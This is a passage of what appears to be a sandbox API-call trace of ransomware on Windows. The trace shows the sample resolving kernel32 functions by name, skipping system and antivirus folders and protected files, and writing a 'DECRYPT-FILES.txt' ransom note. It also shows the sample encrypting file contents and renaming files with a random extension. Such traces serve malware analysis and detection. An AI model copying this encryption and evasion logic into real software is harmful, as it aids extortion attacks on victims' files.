lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.291] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.291] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.291] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.291] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.291] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.291] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.291] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.291] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.291] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.291] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.291] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.291] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.291] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 119 [0078.291] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.U7XTpy") returned 126 [0078.291] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.U7XTpy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.u7xtpy"), dwFlags=0x0) returned 1 [0078.300] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.300] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.301] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.301] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28de3e80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0078.301] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0078.301] CloseHandle (hObject=0x450) returned 1 [0078.301] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x541f1c70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xf6409280, ftLastAccessTime.dwHighDateTime=0x1d4ae2c, ftLastWriteTime.dwLowDateTime=0xf6409280, ftLastWriteTime.dwHighDateTime=0x1d4ae2c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0078.301] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0078.301] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0078.301] lstrcatW (in: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\" | out: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0078.301] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0078.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Program Files") returned 0x0 [0078.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch=":\\Windows") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Games\\") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\All Users") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="AhnLab") returned 0x0 [0078.302] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.302] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.302] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.302] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\jkbimi8.tmp") returned 123 [0078.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0078.304] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.304] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.304] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt") returned 129 [0078.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0078.304] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0078.305] CloseHandle (hObject=0x454) returned 1 [0078.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.305] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" [0078.306] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x541f1c70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaadddf80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaadddf80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0078.306] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.306] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x541f1c70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaadddf80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaadddf80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.306] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.306] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.306] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xf923e050, ftCreationTime.dwHighDateTime=0x1d3aab9, ftLastAccessTime.dwLowDateTime=0xf923e050, ftLastAccessTime.dwHighDateTime=0x1d3aab9, ftLastWriteTime.dwLowDateTime=0xf923e050, ftLastWriteTime.dwHighDateTime=0x1d3aab9, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="02540a10-7eb7-4b20-a8c7-470f8986389c", cAlternateFileName="02540A~1")) returned 1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="DECRYPT-FILES.txt") returned -1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="autorun.inf") returned -1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="boot.ini") returned -1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="desktop.ini") returned -1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="ntuser.dat") returned -1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="iconcache.db") returned -1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="bootsect.bak") returned -1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="ntuser.dat.log") returned -1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="thumbs.db") returned -1 [0078.306] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="Bootfont.bin") returned -1 [0078.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.306] lstrlenW (lpString="02540a10-7eb7-4b20-a8c7-470f8986389c") returned 36 [0078.306] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0078.306] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="02540a10-7eb7-4b20-a8c7-470f8986389c" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" [0078.306] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.307] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=468) returned 1 [0078.307] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.307] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.308] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.308] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.308] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.309] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.309] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.309] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.309] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.310] CloseHandle (hObject=0x45c) returned 1 [0078.310] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.310] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.311] CloseHandle (hObject=0x0) returned 0 [0078.311] CloseHandle (hObject=0x458) returned 1 [0078.311] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.312] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.312] GetTickCount () returned 0x114c13d [0078.312] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.312] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.312] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.312] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.313] lstrlenA (lpString="kernel32.dll") returned 12 [0078.313] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.313] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.313] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.313] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.313] lstrlenA (lpString="ADDATOMA") returned 8 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.313] lstrlenA (lpString="ADDATOMW") returned 8 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.313] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.313] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.313] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.313] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.313] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.313] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.313] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.314] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.314] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.314] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.314] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.314] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.314] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.314] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.314] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.314] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.314] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.314] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.314] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.314] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.314] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.314] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.314] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.314] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.314] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.314] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.315] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.315] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.315] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.315] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.315] lstrcpyA (in: lpString1=0x3f2ca78, 